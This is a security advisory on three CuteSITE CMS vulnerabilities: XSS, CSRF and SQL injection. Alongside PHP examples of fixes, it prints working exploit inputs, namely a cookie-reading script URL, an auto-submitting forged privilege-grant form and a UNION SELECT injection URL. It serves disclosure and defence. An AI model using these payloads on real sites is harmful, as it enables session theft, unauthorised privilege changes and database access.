High-Tech Bridge SA Security Research Lab has discovered three vulnerabilities in CuteSITE CMS which could be exploited to perform cross-site scripting and cross-site request forgery attacks and to execute arbitrary SQL commands in the application's database.
Cross-site scripting (XSS) vulnerability in CuteSITE CMS: CVE-2010-5025
The vulnerability exists due to an input sanitization error in the "fld_path" parameter in manage/main.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
Exploitation example:
http://host/manage/main.php?fld_path=XXX<script>alert(document.cookie%29%3C/script%3E
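The fix for this class of bug is to validate the parameter against what a folder path may contain and to HTML-encode it at the point of output. The following is an added example, not CuteSITE's own code: it assumes main.php reflects fld_path into the page, and the function names and sample inputs are hypothetical.

```php
<?php
// Added example (not CuteSITE's own code): the unsafe reflection pattern the
// advisory describes, beside a hardened version. It assumes main.php echoes
// fld_path back into the page; function names are hypothetical.

// Vulnerable pattern: the raw query parameter is written straight into HTML,
// so markup inside fld_path becomes part of the page.
function render_path_unsafe(array $query): string
{
    $path = $query['fld_path'] ?? '';
    return "<h2>Folder: $path</h2>";
}

// Hardened: accept only what a folder path legitimately contains, then
// HTML-encode at the point of output so the browser treats it as text.
function render_path_safe(array $query): string
{
    $path = $query['fld_path'] ?? '';
    // Word characters, dots, dashes and slashes only; no parent-directory hops.
    if (!preg_match('#^[\w./-]{0,255}\z#', $path) || strpos($path, '..') !== false) {
        $path = '';
    }
    $encoded = htmlspecialchars($path, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<h2>Folder: $encoded</h2>";
}

// Constructed inputs: a normal folder name and the advisory's payload shape.
foreach (['images/2010', 'XXX<script>alert(document.cookie)</script>'] as $value) {
    echo 'unsafe: ', render_path_unsafe(['fld_path' => $value]), PHP_EOL;
    echo 'safe:   ', render_path_safe(['fld_path' => $value]), PHP_EOL;
}
```

Validation alone is not enough (a later change to the allowed character set would silently reopen the hole), so the encoding step stays even when the value passes the check.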
Cross-site request forgery (CSRF) in CuteSITE CMS
The vulnerability exists due to insufficient validation of the request origin in manage/add_user.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and assign arbitrary privileges to registered users.
Exploitation example:
<form action="http://host/manage/add_user.php" method="POST" name="main">
<input type="hidden" name="fld_priv" value="W">
<input type="hidden" name="tpl_priv" value="W">
<input type="hidden" name="img_priv" value="W">
<input type="hidden" name="str_priv" value="W">
<input type="hidden" name="txt_priv" value="W">
<input type="hidden" name="var_priv" value="W">
<input type="hidden" name="snp_priv" value="W">
<input type="hidden" name="usr_priv" value="W">
<input type="hidden" name="hst_priv" value="W">
<input type="hidden" name="plg_priv" value="W">
<input type="hidden" name="user_id" value="33">
<input type="hidden" name="user_login" value="userlogin">
<input type="hidden" name="action" value="Modify">
</form>
<script>
document.main.submit()
</script>
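The forged form above works only because add_user.php accepts any POST that carries a valid admin session cookie. A synchronizer token bound to the session defeats it, since a page on another origin cannot read the token. The following is an added example, not CuteSITE's own code: the function names and the $session array (standing in for $_SESSION) are hypothetical.

```php
<?php
// Added example, not CuteSITE's own code: a synchronizer-token check for a
// state-changing handler such as manage/add_user.php. Function names and
// the $session array are hypothetical stand-ins for $_SESSION.

// Issue one unpredictable token per session and reuse it for every form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Embed the token as a hidden field in the legitimate form.
function csrf_field(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

// Accept the POST only if the submitted token matches in constant time and,
// when the browser sent an Origin or Referer header, it names our own host.
function csrf_valid(array $session, array $post, array $headers, string $ourHost): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !hash_equals($expected, $given)) {
        return false;
    }
    $origin = $headers['Origin'] ?? $headers['Referer'] ?? null;
    if ($origin !== null && parse_url($origin, PHP_URL_HOST) !== $ourHost) {
        return false;
    }
    return true;
}

// Constructed requests: one shaped like the forged form (no token, foreign
// origin) and one submitted from the real admin page with the token.
$session   = [];
$legitForm = csrf_field($session);   // rendered into the genuine admin page
$forged    = ['user_id' => '33', 'action' => 'Modify', 'usr_priv' => 'W'];
$real      = $forged + ['csrf_token' => $session['csrf_token']];

echo 'forged: ', csrf_valid($session, $forged, ['Origin' => 'http://attacker.example'], 'host') ? 'accepted' : 'rejected', PHP_EOL;
echo 'real:   ', csrf_valid($session, $real, ['Origin' => 'http://host'], 'host') ? 'accepted' : 'rejected', PHP_EOL;
```

The Origin/Referer check is a second layer only: both headers are optional, so the token comparison is what the decision must rest on.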
SQL injection vulnerability in CuteSITE CMS: CVE-2010-5024
The vulnerability exists due to an input sanitization error in the "user_id" parameter in manage/add_user.php. A remote attacker can send a specially crafted HTTP GET request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database but requires "Read" permissions for "Users".
Exploitation example:
http://host/manage/add_user.php?user_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user%28%29,15,16
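The union payload works because user_id is concatenated into the SQL text. Binding it as a parameter, after checking that it is a positive integer, removes the attacker's ability to change the statement. The following is an added example, not CuteSITE's own code: it uses an in-memory SQLite database so it runs stand-alone, and the table, column names and the 'R'/'W' privilege model are constructed for illustration (the advisory only says "Read" permission on "Users" is needed to reach the page).

```php
<?php
// Added example, not CuteSITE's own code: the string-built query the advisory
// implies, beside a parameterised version with the page's permission check.
// Uses in-memory SQLite so it runs offline; schema and privilege values are
// constructed for illustration.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, user_login TEXT, usr_priv TEXT)');
$db->exec("INSERT INTO users VALUES (33, 'userlogin', 'R')");

// Vulnerable pattern: the GET parameter becomes part of the SQL text, so a
// value beginning "-1 union select ..." rewrites the statement itself.
function load_user_unsafe(PDO $db, string $userId): array
{
    $sql = "SELECT user_id, user_login, usr_priv FROM users WHERE user_id = $userId";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the caller must hold the permission the page requires, the id
// must be a positive integer, and it travels as a bound parameter.
function load_user_safe(PDO $db, array $actorPrivs, string $userId): array
{
    $priv = $actorPrivs['usr_priv'] ?? '';
    if ($priv !== 'R' && $priv !== 'W') {
        throw new RuntimeException('Users: read permission required');
    }
    if (!ctype_digit($userId) || $userId === '0') {
        throw new InvalidArgumentException('user_id must be a positive integer');
    }
    $stmt = $db->prepare('SELECT user_id, user_login, usr_priv FROM users WHERE user_id = :id');
    $stmt->execute([':id' => (int) $userId]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed probe with the advisory's payload shape (three columns here).
$probe = '-1 union select 1, sqlite_version(), 3';

print_r(load_user_unsafe($db, $probe));              // runs the injected UNION unchanged
try {
    load_user_safe($db, ['usr_priv' => 'R'], $probe);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
print_r(load_user_safe($db, ['usr_priv' => 'R'], '33'));
```

The integer check is a convenience for clearer error handling; the bound parameter is what removes the injection, and it would do so even if the check were dropped.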